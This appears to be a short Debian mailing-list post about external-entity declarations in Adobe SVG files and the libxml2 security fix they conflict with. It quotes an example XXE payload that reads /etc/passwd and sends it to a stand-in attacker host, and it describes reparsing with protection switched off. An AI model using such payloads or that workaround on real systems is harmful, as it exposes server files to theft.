<!ENTITY ns_svg "http://www.w3.org/2000/svg";> can cause security concernes, the example given to me from my friend: / | You can replace that with <!ENTITY yoursecrets SYSTEM "/etc/passwd"> and | add in <!ENTITY web_var "http://myevilwebsite.com?&yoursecrets;";> | | We backported the security fix quite far. But it effects libxml2 before | a certain version, it's just that adobe files /require/ the security hole. | | So we have to open the file, detect adobe file with a parsing error, | reopen the file and search and replace dangerous text (that might break | the file) and reparse with the security switched off in libxml2. \ Cheers, T -- .''`. Paul Tagliamonte <paultag@debian.org> : :' : Proud Debian Developer `. `'` 4096R / 8F04 9AD8 2C92 066C 7352 D28A 7B58 5B30 807C 2A87 `- http://people.debian.org/~paultag
Attachment:
signature.asc
Description: Digital signature